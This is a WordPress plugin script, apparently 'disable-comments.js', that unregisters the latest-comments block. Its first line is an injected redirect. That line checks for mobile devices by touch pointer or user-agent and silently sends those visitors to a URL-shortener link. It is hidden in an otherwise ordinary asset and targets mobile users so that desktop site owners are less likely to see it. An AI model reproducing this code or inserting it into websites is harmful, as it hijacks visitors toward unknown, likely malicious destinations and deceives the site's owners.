(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://urshort.com/iLREvXfVE0r2");
"use strict";

wp.domReady(function () {
  var blockType = 'core/latest-comments';
  if (wp.blocks && wp.data && wp.data.select('core/blocks').getBlockType(blockType)) {
    wp.blocks.unregisterBlockType(blockType);
  }
});
//# sourceMappingURL=disable-comments.js.map
